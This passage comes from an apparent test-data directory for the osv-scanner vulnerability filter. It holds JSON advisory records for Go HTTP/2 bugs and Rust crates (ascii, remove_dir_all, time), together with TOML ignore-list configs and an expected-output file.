"0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571", "CVE-2022-41723" ] } ] } ] }, { "source": { "path": "testdata/filter/all/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/all/want.json ================================================ { "results": [], "experimental_config": { "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/a/no_config ================================================ ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/b/osv-scanner.toml ================================================ # An empty config file ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/c/osv-scanner.toml ================================================ # These vulnerabilities do not appear in this 'source' [[IgnoredVulns]] id = "GHSA-fxg5-wq6x-vr4w" reason = "Ignore 1" [[IgnoredVulns]] id = "GO-2022-1144" reason = "Ignore 2" [[IgnoredVulns]] id = "GO-2023-1571" reason = "Ignore 3" ================================================ FILE: pkg/osvscanner/testdata/filter/none/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", 